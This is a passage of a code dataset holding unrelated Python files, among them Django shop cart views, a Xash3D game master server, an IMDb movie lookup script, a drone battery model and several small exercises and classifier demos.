2","sub_path":"Methods/M22_Lineal_Splain.py","file_name":"M22_Lineal_Splain.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"347383193","text":"from django.shortcuts import render, get_object_or_404, redirect\n\n# Create your views here.\nfrom django.views.decorators.http import require_POST\n\nfrom shop.models import Produk\nfrom .cart import Keranjang\nfrom .forms import TambahProdukForm\n\n\n@require_POST\ndef cart_tambah(req, produk_id):\n krj = Keranjang(req)\n produk = get_object_or_404(Produk, id=produk_id)\n form = TambahProdukForm(req.POST)\n if form.is_valid():\n cd = form.cleaned_data\n krj.tambah(produk,\n cd['jumlah'],\n cd['override'], )\n\n return redirect('cartApp:detailUrl')\n\n\n@require_POST\ndef cart_hapus(req, produk_id):\n krj = Keranjang(req)\n produk = get_object_or_404(Produk, id=produk_id)\n krj.hapus(produk)\n return redirect('cartApp:detailUrl')\n\n\ndef cart_detail(req):\n krj = Keranjang(req)\n for item in krj:\n item['ubah_jml_form'] = TambahProdukForm(initial={\n 'jumlah': item['jml'],\n 'override': True,\n })\n return render(req, 'cart/detail.html', {'keranjangKey': krj})\n","sub_path":"antoniomele_olshop/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"376844550","text":"from django import forms\nfrom django.db.models import get_model\n\nfrom itertools import chain\n\nfrom django.forms.util import flatatt\nfrom django.utils.datastructures import MultiValueDict, MergeDict\nfrom django.utils.html import format_html\nfrom django.utils.safestring import mark_safe\nfrom django.template.loader import render_to_string\n\n\nclass TreeWidget(forms.widgets.SelectMultiple):\n def __init__(self, instance, attrs=None, choices=()):\n super(TreeWidget, self).__init__(attrs)\n self.instance = instance\n\n def render(self, name, value, attrs=None, choices=()):\n final_attrs = self.build_attrs(attrs, name=name)\n output = render_to_string('treeheaders/TreeWidget.html', {\n 'final_attrs': final_attrs,\n 'instance': self.instance,\n 'app_label': self.instance._meta.app_label,\n 'model_name': self.instance._meta.object_name,\n 'value': value\n })\n return mark_safe(output)\n\n class Media:\n js = (\n '//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js',\n 'jstree/js/jstree.js',\n 'js/jquery-csrf.js',\n )\n css = {\n 'screen': ('jstree/themes/default/style.min.css',)\n }\n","sub_path":"apps/treeheaders/widgets.py","file_name":"widgets.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"41941641","text":"#!/usr/bin/env python3\nimport socket\nimport random\nimport sys\nimport traceback\nimport logging\nimport os\nfrom optparse import OptionParser\nfrom struct import pack\nfrom time import time\n\nfrom server_entry import ServerEntry\nfrom protocol import MasterProtocol\n\nLOG_FILENAME = 'pymaster.log'\n\ndef logPrint( msg ):\n\tlogging.debug( msg )\n\nclass PyMaster:\n\tdef __init__(self, ip, port):\n\t\tself.serverList = []\n\t\tself.sock = socket.socket( socket.AF_INET, socket.SOCK_DGRAM )\n\t\tself.sock.bind( (ip, port) )\n\n\t\tlogPrint(\"Welcome to PyMaster!\")\n\t\tlogPrint(\"I ask you again, are you my master?\")\n\t\tlogPrint(\"Running on %s:%d\" % (ip, port))\n\n\tdef serverLoop(self):\n\t\tdata, addr = self.sock.recvfrom(1024)\n\t\tdata = data.decode('latin_1')\n\n\t\tif( data[0] == MasterProtocol.clientQuery ):\n\t\t\tself.clientQuery(data, addr)\n\t\telif( data[0] == MasterProtocol.challengeRequest ):\n\t\t\tself.sendChallengeToServer(data, addr)\n\t\telif( data[0] == MasterProtocol.addServer ):\n\t\t\tself.addServerToList(data, addr)\n\t\telif( data[0] == MasterProtocol.removeServer ):\n\t\t\tself.removeServerFromList(data, addr)\n\t\telse:\n\t\t\tlogPrint(\"Unknown message: {0} from {1}:{2}\".format(data, addr[0], addr[1]))\n\n\tdef clientQuery(self, data, addr):\n\t\tregion = data[1] # UNUSED\n\t\tdata = data.strip('1' + region)\n\t\ttry:\n\t\t\tquery = data.split('\\0')\n\t\texcept ValueError:\n\t\t\tlogPrint(traceback.format_exc())\n\t\t\treturn\n\n\t\tqueryAddr = query[0] # UNUSED\n\t\trawFilter = query[1]\n\n\t\t# Remove first \\ character\n\t\trawFilter = rawFilter.strip('\\\\')\n\t\tsplit = rawFilter.split('\\\\')\n\n\t\t# Use NoneType as undefined\n\t\tgamedir = 'valve' # halflife, by default\n\t\tclver = None\n\t\tnat = 0\n\n\t\tfor i in range( 0, len(split), 2 ):\n\t\t\ttry:\n\t\t\t\tkey = split[i + 1]\n\t\t\t\tif( split[i] == 'gamedir' ):\n\t\t\t\t\tgamedir = key.lower() # keep gamedir in lowercase\n\t\t\t\telif( split[i] == 'nat' ):\n\t\t\t\t\tnat = int(key)\n\t\t\t\telif( split[i] == 'clver' ):\n\t\t\t\t\tclver = key\n\t\t\t\telse:\n\t\t\t\t\tlogPrint('Unhandled info string entry: {0}/{1}. Infostring was: {2}'.format(split[i], key, split))\n\t\t\texcept IndexError:\n\t\t\t\tpass\n\n\t\tif( clver == None ): # Probably an old vulnerable version\n\t\t\tself.fakeInfoForOldVersions( gamedir, addr )\n\t\t\treturn\n\n\t\tpacket = MasterProtocol.queryPacketHeader\n\t\tfor i in self.serverList:\n\t\t\tif( time() > i.die ):\n\t\t\t\tself.serverList.remove(i)\n\t\t\t\tcontinue\n\n\t\t\tif( not i.check ):\n\t\t\t\tcontinue\n\n\t\t\tif( nat != i.nat ):\n\t\t\t\tcontinue\n\n\t\t\tif( gamedir != None ):\n\t\t\t\tif( gamedir != i.gamedir ):\n\t\t\t\t\tcontinue\n\n\t\t\tif( nat ):\n\t\t\t\treply = '\\xff\\xff\\xff\\xffc {0}:{1}'.format( addr[0], addr[1] )\n\t\t\t\tdata = reply.encode( 'latin_1' )\n\t\t\t\t# Tell server to send info reply\n\t\t\t\tself.sock.sendto( data, i.addr )\n\n\t\t\t# Use pregenerated address string\n\t\t\tpacket += i.queryAddr\n\t\tpacket += b'\\0\\0\\0\\0\\0\\0' # Fill last IP:Port with \\0\n\t\tself.sock.sendto(packet, addr)\n\n\tdef fakeInfoForOldVersions(self, gamedir, addr):\n\t\tdef sendFakeInfo(sock, warnmsg, gamedir, addr):\n\t\t\tbaseReply = b\"\\xff\\xff\\xff\\xffinfo\\n\\host\\\\\" + warnmsg.encode('utf-8') + b\"\\map\\\\update\\dm\\\\0\\\\team\\\\0\\coop\\\\0\\\\numcl\\\\32\\maxcl\\\\32\\\\gamedir\\\\\" + gamedir.encode('latin-1') + b\"\\\\\"\n\t\t\tsock.sendto(baseReply, addr)\n\n\t\tsendFakeInfo(self.sock, \"This version is not\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"supported anymore\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"Please update Xash3DFWGS\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"From GooglePlay or GitHub\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"Эта версия\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"устарела\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"Обновите Xash3DFWGS c\", gamedir, addr)\n\t\tsendFakeInfo(self.sock, \"GooglePlay или GitHub\", gamedir, addr)\n\n\tdef removeServerFromList(self, data, addr):\n\t\tfor i in self.serverList:\n\t\t\tif (i.addr == addr):\n\t\t\t\tlogPrint(\"Remove Server: from {0}:{1}\".format(addr[0], addr[1]))\n\t\t\t\tself.serverList.remove(i)\n\n\tdef sendChallengeToServer(self, data, addr):\n\t\tlogPrint(\"Challenge Request: from {0}:{1}\".format(addr[0], addr[1]))\n\t\t# At first, remove old server- data from list\n\t\t#self.removeServerFromList(None, addr)\n\n\t\tcount = 0\n\t\tfor i in self.serverList:\n\t\t\tif ( i.addr[0] == addr[0] ):\n\t\t\t\tif( i.addr[1] == addr[1] ):\n\t\t\t\t\tself.serverList.remove(i)\n\t\t\t\telse:\n\t\t\t\t\tcount += 1\n\t\t\t\tif( count > 7 ):\n\t\t\t\t\treturn\n\n\t\t# Generate a 32 bit challenge number\n\t\tchallenge = random.randint(0, 2**32-1)\n\n\t\t# Add server to list\n\t\tself.serverList.append(ServerEntry(addr, challenge))\n\n\t\t# And send him a challenge\n\t\tpacket = MasterProtocol.challengePacketHeader\n\t\tpacket += pack('I', challenge)\n\t\tself.sock.sendto(packet, addr)\n\n\tdef addServerToList(self, data, addr):\n\t\tlogPrint(\"Add Server: from {0}:{1}\".format(addr[0], addr[1]))\n\t\t# Remove the header. Just for better parsing.\n\t\tserverInfo = data.strip('\\x30\\x0a\\x5c')\n\n\t\t# Find a server with same address\n\t\tfor serverEntry in self.serverList:\n\t\t\tif( serverEntry.addr == addr ):\n\t\t\t\tbreak\n\n\t\tserverEntry.setInfoString( serverInfo )\n\ndef spawn_pymaster(verbose, ip, port):\n\tif verbose:\n\t\tlogging.getLogger().addHandler(logging.StreamHandler())\n\tlogging.getLogger().addHandler(logging.FileHandler(LOG_FILENAME))\n\tlogging.getLogger().setLevel(logging.DEBUG)\n\n\tmasterMain = PyMaster(ip, port)\n\twhile True:\n\t\ttry:\n\t\t\tmasterMain.serverLoop()\n\t\texcept Exception:\n\t\t\tlogPrint(traceback.format_exc())\n\t\t\tpass\n\nif __name__ == \"__main__\":\n\tparser = OptionParser()\n\tparser.add_option('-i', '--ip', action='store', dest='ip', default='0.0.0.0',\n\t\thelp='ip to listen [default: %default]')\n\tparser.add_option('-p', '--port', action='store', dest='port', type='int', default=27010,\n\t\thelp='port to listen [default: %default]')\n\tparser.add_option('-d', '--daemonize', action='store_true', dest='daemonize', default=False,\n\t\thelp='run in background, argument is uid [default: %default]')\n\tparser.add_option('-q', '--quiet', action='store_false', dest='verbose', default=True,\n\t\thelp='don\\'t print to stdout [default: %default]')\n\n\t(options, args) = parser.parse_args()\n\n\tif options.daemonize != 0:\n\t\tfrom daemon import pidfile, DaemonContext\n\n\t\twith DaemonContext(stdout=sys.stdout, stderr=sys.stderr, working_directory=os.getcwd()) as context:\n\t\t\tspawn_pymaster(options.verbose, options.ip, options.port)\n\telse:\n\t\tsys.exit(spawn_pymaster(options.verbose, options.ip, options.port))\n","sub_path":"pymaster.py","file_name":"pymaster.py","file_ext":"py","file_size_in_byte":6220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"638340642","text":"# Author Maria Carroll\n# Adapted from:https://tour.golang.org/flowcontrol/8\n# https://realpython.com/python-square-root-function/\n# Lecturer Andrfew Beatty\n\ndef sqrt(x):\n # Initial guess,\n z = 1.0\n \n # Keep getting a better estimate for the square root\n # of x until you are within two decimal places.\n # While the difference between those two numbers is greater than or equal to \n # 0.01. want to be 0.01 close to 0\n while abs(z*z - x) >= 0.01:\n # Get a better approximation for the square root. by multiplying z by itself should get a very close or even the exact value of x.\n z -= (z*z - x) / (2*z)\n\n return z\n# Calculate the square root of 14.8\n\nz = (sqrt(14.8))\n# Print z\nprint (z)\n# Print the square root of the square of z.\nprint(z*z)\n# Only an approximation\n# We are runnning an algorithm that performs a loop,\n# a while loop, our algorithm finds an approximation of the answer. Newtons method is a root finding algorithm, \n# that always comes to an end.\n","sub_path":"approx-sqrt.py","file_name":"approx-sqrt.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"101615531","text":"from imdb import IMDb\r\nia = IMDb()\r\nname = input('Enter movie name: ')\r\nsearch = ia.search_movie(name)\r\nif (len(search) != 0):\r\n ser_flag = 0\r\n loc = -1\r\n for v in search:\r\n if (name == str(v).lower()):\r\n ser_flag = ser_flag + 1\r\n if (ser_flag > 1):\r\n print('\\n**INFO: There are more than one movies with this same title. Details of most popular movie on IMDb is displayed**')\r\n for v in search:\r\n if (name == str(v).lower()):\r\n loc = search.index(v)\r\n break\r\n if (loc != -1): \r\n id = search[loc].movieID\r\n movie = ia.get_movie(id)\r\n curr = movie.current_info\r\n print('\\nMovie: ' + movie['title'] + ' (' + str(movie['year']) + ')')\r\n print('\\nCountry: '+movie.data['countries'][0] + '\\tLanguage: ' + movie.data['languages'][0])\r\n print('\\nIMDb Rating: ',movie.data['rating'])\r\n plot = movie['plot']\r\n pi = ''\r\n for k in plot:\r\n if '::' in k:\r\n ind = k.index('::')\r\n k = k[0:ind]\r\n pi = pi + k\r\n print('\\nSynopsis: ',pi)\r\n cast1 = movie['cast']\r\n cast_var = ''\r\n cast_flag = 0\r\n for h in cast1:\r\n cast_flag = cast_flag + 1\r\n cast_var = cast_var + str(h['name'] + ',')\r\n if (cast_flag > 9):\r\n break\r\n print('\\nCast: ',cast_var[0:len(cast_var)-1])\r\n di = ''\r\n for director in movie['directors']:\r\n di = di + str(director) + '-'\r\n print('\\nDirector: ' + di[0:len(di)-1])\r\n gi = ''\r\n for genre in movie['genres']:\r\n gi = gi + genre + ','\r\n print('\\nGenre: ' + gi[0:len(gi)-1])\r\n else:\r\n print(\"\\nNo such movie exist in database!\")\r\nelse:\r\n print(\"\\nNo such movie exist in database!\")\r\n","sub_path":"moviedb.py","file_name":"moviedb.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290740072","text":"# priyadarshan Ghosh\r\nfrom tkinter import *\r\nfrom tkcalendar import *\r\nwin=Tk()\r\nwin.geometry(\"200x200\")\r\nwin.title(\"Calendar\")\r\nwin.configure(bg=\"yellow\")\r\ndef calendar():\r\n def grabdate():\r\n global date1\r\n date1=cal.get_date()\r\n top.destroy()\r\n Label(win,text=\"Date Selected\",fg=\"green\",font=(\"elephant\",11)).pack()\r\n Label(win,text=date1,fg=\"green\",font=(\"elephant\",11)).pack()\r\n top=Toplevel(win)\r\n cal=Calendar(top,selectmode=\"day\",year=2020,month=7,day=11)\r\n cal.pack()\r\n cbutton=Button(top,text=\"OK\",command=grabdate).pack()\r\nLabel(win,text=\"Select Date\",font=(\"calibri\",20)).pack()\r\nButton(win,text=\"See Calendar\",command=calendar).pack(padx=10,pady=10)\r\nwin.mainloop()","sub_path":"Calender.py","file_name":"Calender.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"290123090","text":"# Hint: You may not need all of these. Remove the unused functions.\nfrom hashtables import (HashTable,\n hash_table_insert,\n hash_table_remove,\n hash_table_retrieve,\n hash_table_resize)\n\n\"\"\"\n* The crux of this problem requires us to 'link' tickets together to reconstruct the entire trip. For example, if we have a ticket `('SJC', 'BOS')` that has us flying from San Jose to Boston, then there exists another ticket where Boston is the starting location, `('BOS', 'JFK')`.\n* We can hash each ticket such that the starting location is the key and the destination is the value. Then, when constructing the entire route, the `i`th location in the route can be found by checking the hash table for the `i-1`th location.\n* You might need to do some cleanup at the end to make sure results match what the test and example are expecting.\n\"\"\"\nclass Ticket:\n def __init__(self, source, destination):\n self.source = source\n self.destination = destination\n\ndef reconstruct_trip(tickets, length):\n hashtable = HashTable(length)\n # route = [None] * length\n route = []\n\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n\n # for loop - ticket in tickets (key: source, value: destination)\n for ticket in tickets:\n # hash table insert function ht, source, and destination\n hash_table_insert(hashtable, ticket.source, ticket.destination)\n # account for NONE\n destination = hash_table_retrieve(hashtable, 'NONE')\n # while loop - destination != NONE\n while destination is not 'NONE':\n # append destination to route\n route.append(destination)\n # destination set to retrieve ht, destination\n destination = hash_table_retrieve(hashtable, destination)\n\n # return route\n return route","sub_path":"hashtables/ex2/ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"339037980","text":"from kata.bowling.oo import Frame, Game\n\n\ndef test_empty_game_scores_zero():\n game = Game()\n assert game.score() == 0\n\n\ndef play_game(rolls):\n '''\n @param rolls: sequence of (x, y) tuples where x represents the first roll and y the second\n '''\n game = Game()\n for roll in rolls:\n frame = Frame(*roll)\n game.add_frame(frame)\n return game\n\n\ndef test_rolling_all_misses_scores_zero():\n game = play_game(\n (0, 0) for i in range(10)\n )\n assert game.score() == 0\n\n\ndef test_all_ones_score_20():\n game = play_game(\n (1, 1) for i in range(10)\n )\n assert game.score() == 20\n\n\n#def test_spare_then_three_then_misses_scores_16():\n# game = play_game(\n# )\n","sub_path":"kata/tests/bowling/test_oo.py","file_name":"test_oo.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"321705629","text":"# -*- coding:utf-8 -*-\n\"\"\"\n구조\n바이너리 파일 중 0xC 를 통해 시작 주소를 찾은후(foundoffset)\n룬팩토리 파일은 00을 기준으로 대사가 나뉘므로\n00이 있는 글자를 하나하나 찾아갑니다\n\n00이 없을경우 shortoffset을 1씩 증가하면서 찾고\n00을 찾을경우 닫은후 다시 열어서 시작주소로 간후\nshortoffset만큼 대사를 추출한후\nlongoffset에 shortoffset만큼 더한후 다시 그것을 시작주소로 만듭니다\n\"\"\"\n\nglobal readfile\nglobal writefile\nimport sys\n\ndef init(inFp):\n inFp.close()\n inFp = open(readfile, \"rb\")\n return inFp\n\ndef foundoffset(inFp):\n blank=[]\n inFp = open(readfile, \"rb\")\n inFp.read(0xC)\n for i in range(1,5):\n startpath=inFp.read(1)\n temp=hex(ord(startpath))\n if(temp==\"0x0\"):\n temp=\"0x00\"\n blank.append(temp) #각각 읽어 blank에 추가\n blank.reverse() #리틀엔디안->빅엔디안\n pointer=\"\"\n pointer += blank[0]\n pointer += blank[1]\n pointer += blank[2]\n pointer += blank[3]\n pointer=pointer.replace(\"0x\",\"\")\n result=\"0x\"+pointer\n return int(result,16)\n\n\nreadfile=sys.argv[1]\ntry:\n writefile = sys.argv[2]\nexcept:\n writefile=readfile\n writefile+=\".txt\"\ninFp=0\ntexts=[]\nlongoffset=0 #시작부터 끝까지 0으로 초기화가 안됨\nshortoffset=0 #한번 찾으면 바로 초기화\n\nstartoffset=foundoffset(inFp) #오프셋찾기(0x0c)\nprint(startoffset)\ninFp=open(readfile,\"rb\")\noutFp=open(writefile,\"w\")\n\n\ninFp=open(readfile,\"rb\")\ns = inFp.read(startoffset)\n\n\nwhile True:\n s = inFp.read(1)\n #if #s == '': break\n #print ('%02X' % int(ord(s))) # 1바이트씩 출력\n if s == '':\n break\n if(ord(s)==00):\n inFp=init(inFp) #닫고 다시염\n a=inFp.read(startoffset) #처음 커서까지 이동\n if(longoffset!=0):\n a = inFp.read(longoffset+1) # 방금까지의 오프셋으로 이동\n a = inFp.read(shortoffset-1) # 총 대사길이 이동\n else:\n a = inFp.read(shortoffset) # 총 대사길이 이동\n longoffset+=shortoffset\n shortoffset=0 #대사길이 초기화\n\n a=str(a)\n print(a[1:])\n outFp.write(a[2:-1])\n outFp.write(\"\\n\")\n a=inFp.read(1)\n\n shortoffset+=1 #대사길이 추가\n\ninFp.close()\noutFp.close()","sub_path":"Deprecated/RF Text Dump.py","file_name":"RF Text Dump.py","file_ext":"py","file_size_in_byte":2362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"276368455","text":"class Morph:\n def __init__(self, surface, base, pos, pos1):\n self.surface = surface\n self.base = base\n self.pos = pos\n self.pos1 = pos1\n\n def __str__(self):\n return \"surface:({})\\tbase:({})\\tpos:({})\\tpos1:({})\".format(\n self.surface, self.base, self.pos, self.pos1\n )\n\n\ndef morphs(sentence):\n morph_list = []\n for line in sentence:\n line = line.split(\"\\t\")\n if line == [\"\"]:\n continue\n surface = line[0]\n line = line[1].split(\",\")\n base = line[-3]\n pos = line[0]\n pos1 = line[1]\n morph = Morph(surface, base, pos, pos1)\n morph_list.append(morph)\n\n return morph_list\n\n\nclass Chunk:\n def __init__(self):\n self.morphs = []\n self.dst = 0\n self.srcs = []\n\n def __str__(self):\n string = \"\".join([morph.surface for morph in self.morphs])\n return \"{}\\tdst:({})\\tsrcs:({})\".format(string, self.dst, self.srcs)\n\n def rm_symbol(self):\n morphs = self.morphs\n morphs = [morph for morph in morphs if morph.pos != \"記号\"]\n return morphs\n\n def check_pos(self, pos):\n morphs = self.morphs\n for morph in morphs:\n if morph.pos == pos:\n return True\n return False\n\n\ndef chunks(rr, lines):\n rr_dict = {r: l for r, l in zip(rr, lines)}\n chunk_list = []\n\n for rr, lines in rr_dict.items():\n rr = rr.split()\n chunk = Chunk()\n lines = lines.split(\"\\n\")\n morph_list = morphs(lines)\n chunk.morphs = morph_list\n chunk.dst = int(rr[2].replace(\"D\", \"\"))\n chunk_list.append(chunk)\n\n for i, chunk in enumerate(chunk_list):\n if chunk.dst != -1:\n chunk_list[chunk.dst].srcs.append(i)\n return chunk_list\n\n\ndef received_relates(cabocha_data, sentence_n):\n sentences = cabocha_data.split(\"EOS\\n\")\n sentence = sentences[sentence_n - 1].split(\"\\n\")\n rr = []\n lines = []\n for i, line in enumerate(sentence):\n if line.startswith(\"*\"):\n rr.append(line)\n line = []\n for sc in range(i + 1, len(sentence)):\n if sentence[sc].startswith(\"*\"):\n break\n else:\n line.append(sentence[sc])\n lines.append(\"\\n\".join(line))\n else:\n continue\n\n return lines, rr\n\n\ndef to_sentence(lines):\n sentence = []\n for line in lines:\n line = line.split(\"\\n\")\n for l in line:\n sentence.append(l)\n\n return sentence\n","sub_path":"5/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"326908032","text":"#distance = 6000 # m\n#payload = 5 # kg\nV = 14.8 # taken 4 cell Lipo battery\nbattery_cr_dis = 0.80 # 80 percentage\nrate = 5 # charging price for per kwh\nspeed = 7 # m/s\nframe_weight = 1 # kg\nTTWR = 1.5 # thrust to weight ratio\ng = 9.8 # m/s^2\n\n\ndef AmpRate(payload, distance):\n battery_weight = 0.5 # kg\n TOF = distance / speed # time of flight\n Power = TTWR * (battery_weight + frame_weight + payload) * speed * g\n Amp_rating = (Power * TOF * 1000) / (V * battery_cr_dis * 3600) #mAh ( 1000/36000) factor\n\n max_iter = 100\n start_iter = 0\n\n while (start_iter < max_iter):\n start_iter += 1\n Power = TTWR * (battery_weight + frame_weight + payload) * speed * g\n Amp_rating = (Power * TOF * 1000) / (V * battery_cr_dis * 3600) #mAh ( 1000/36000) factor\n battery_weight = 0.0005 * (Amp_rating**0.8182)\n\n Total_Energy = (Power * TOF) / 3600000 # kWh\n Total_cost = Total_Energy * rate #Total charging cost of electricity\n #print(Total_cost)\n #print(battery_weight)\n #print(\"local \", Amp_rating)\n return Amp_rating\n\n\ndef BatWeight(Amp_rating):\n battery_weight = 0.0005 * (Amp_rating**0.8182)\n return battery_weight\n\ndef Cost(Amp_rating, weight, payload, distance):\n Total_Energy = (Amp_rating * V) / (10**6) # kwHr\n Cost = 2 + 3 *(Total_Energy * rate)\n return Cost\n\n\n\ndef main():\n print(\"Nothing\")\n\nif __name__ == '__main__':\n main()","sub_path":"drone_model.py","file_name":"drone_model.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"357860335","text":"from PIL import Image\nimport numpy\nfrom data_visualization.render_character import render_with_pyplot\nfrom classifier_mlp.iteration_2_load_clf import mlp_classifier\nfrom classifier_rfc.iteration_2_load_clf import rfc_classifier\nfrom classifier_sgd.iteration_2_load_clf import sgd_classifier\nfrom data_management.adapters import to_character\nfrom sklearn.metrics import recall_score, precision_score\nfrom demo_adapters import as_28_by_28, as_grayscale_list, flatten\n\n\ndef adapt_for_prediction(img):\n rgb_list = img.getdata()\n grayscale_list = as_grayscale_list(rgb_list)\n grayscale_28_by_28 = as_28_by_28(grayscale_list)\n flattened_image = flatten(grayscale_28_by_28)\n return flattened_image\n\ndef predict(img, actual):\n flattened_image = adapt_for_prediction(img)\n\n mlp_prediction = mlp_classifier.predict([flattened_image])\n rfc_prediction = rfc_classifier.predict([flattened_image])\n sgd_prediction = sgd_classifier.predict([flattened_image])\n \n print('actual = ', actual)\n print('mlp_prediction = ', to_character(mlp_prediction))\n print('rfc_prediction = ', to_character(rfc_prediction))\n print('sgd_prediction = ', to_character(sgd_prediction), '\\n')\n\n\n\ncharacters_drawn_by_riley = list(map(\n lambda ascii_number: (chr(ascii_number), chr(ascii_number - 32)), \n range(97, 122)\n))\n\npredictions = []\nfor (lowercase_chr, uppercase_chr) in characters_drawn_by_riley:\n uppercase_img = Image.open(\n '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-'\n + uppercase_chr +\n '-cap.png'\n )\n\n lowercase_img = Image.open(\n '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-' \n + lowercase_chr +\n '.png'\n )\n\n predict(uppercase_img, uppercase_chr)\n predict(lowercase_img, lowercase_chr)\n\nimages = []\nlabels = []\nfor (lowercase_chr, uppercase_chr) in characters_drawn_by_riley:\n images.append(adapt_for_prediction(Image.open(\n '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-'\n + uppercase_chr +\n '-cap.png'\n )))\n labels.append(ord(lowercase_chr) - 96)\n\n images.append(adapt_for_prediction(Image.open(\n '/Users/rileylittlefield/Desktop/classify_chars_ml/src/demo/riley-'\n + lowercase_chr +\n '.png'\n )))\n labels.append(ord(lowercase_chr) - 96)\n\ndef grade_performance(characters, labels, classifier, clf_name):\n predictions = classifier.predict(characters)\n precision = precision_score(\n labels,\n predictions,\n average='macro'\n )\n print(clf_name, 'precision = ', precision)\n\n recall = recall_score(\n labels,\n predictions,\n average='macro'\n )\n print(clf_name, 'recall = ', recall, '\\n')\n\n\ngrade_performance(images, labels, mlp_classifier, 'mlp_classifier')\n# mlp_classifier precision = 0.6933333333333332\n# mlp_classifier recall = 0.7\n\ngrade_performance(images, labels, rfc_classifier, 'rfc_classifier')\n# rfc_classifier precision = 0.63\n# rfc_classifier recall = 0.58\n\ngrade_performance(images, labels, sgd_classifier, 'sgd_classifier')\n# sgd_classifier precision = 0.43920634920634927\n# sgd_classifier recall = 0.42\n","sub_path":"src/demo/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":3186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"302406765","text":"\"\"\"{{ cookiecutter.project }} analysis.\"\"\"\n\nimport os\nimport logging\nimport argparse\nimport errno\n\nfrom dtoolcore import DataSet\n\nfrom jicbioimage.core.image import Image\nfrom jicbioimage.core.transform import transformation\nfrom jicbioimage.core.io import AutoName, AutoWrite\n\n__version__ = \"{{ cookiecutter.version }}\"\n\nAutoName.prefix_format = \"{:03d}_\"\n\n\ndef safe_mkdir(directory):\n \"\"\"Create directories if they do not exist.\"\"\"\n try:\n os.makedirs(directory)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(directory):\n pass\n else:\n raise\n\n\ndef item_output_path(output_directory, rel_path):\n \"\"\"Return item output path; and create it if it does not already exist.\"\"\"\n abs_path = os.path.join(output_directory, rel_path)\n safe_mkdir(abs_path)\n return abs_path\n\n\n@transformation\ndef identity(image):\n \"\"\"Return the image as is.\"\"\"\n return image\n\n\ndef analyse_file(fpath, output_directory):\n \"\"\"Analyse a single file.\"\"\"\n logging.info(\"Analysing file: {}\".format(fpath))\n\n AutoName.directory = output_directory\n\n image = Image.from_file(fpath)\n image = identity(image)\n\n\ndef analyse_dataset(dataset_dir, output_dir):\n \"\"\"Analyse all the files in the dataset.\"\"\"\n dataset = DataSet.from_path(dataset_dir)\n logging.info(\"Analysing items in dataset: {}\".format(dataset.name))\n\n for i in dataset.identifiers:\n data_item_abspath = dataset.abspath_from_identifier(i)\n item_info = dataset.item_from_identifier(i)\n\n specific_output_dir = item_output_path(output_dir, item_info[\"path\"])\n analyse_file(data_item_abspath, specific_output_dir)\n\n\ndef main():\n # Parse the command line arguments.\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument(\"input_dataset\", help=\"Input dataset\")\n parser.add_argument(\"output_dir\", help=\"Output directory\")\n parser.add_argument(\"--debug\", default=False, action=\"store_true\",\n help=\"Write out intermediate images\")\n args = parser.parse_args()\n\n # Create the output directory if it does not exist.\n if not os.path.isdir(args.output_dir):\n os.mkdir(args.output_dir)\n AutoName.directory = args.output_dir\n\n # Only write out intermediate images in debug mode.\n if not args.debug:\n AutoWrite.on = False\n\n # Setup a logger for the script.\n log_fname = \"audit.log\"\n log_fpath = os.path.join(args.output_dir, log_fname)\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(filename=log_fpath, level=logging_level)\n\n # Log some basic information about the script that is running.\n logging.info(\"Script name: {}\".format(__file__))\n logging.info(\"Script version: {}\".format(__version__))\n\n # Run the analysis.\n if os.path.isdir(args.input_dataset):\n analyse_dataset(args.input_dataset, args.output_dir)\n else:\n parser.error(\"{} not a directory\".format(args.input_dataset))\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"{{cookiecutter.project}}/scripts/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"221837466","text":"#!/usr/bin/python3.6\n#coding:utf-8\n\n\"\"\"\n@author: Robot Liu\n@contact: robotliu0327@gmail.com\n@software: PyCharm\n@file: 76.最小覆盖子串.py\n@time: 2020-08-20 上午 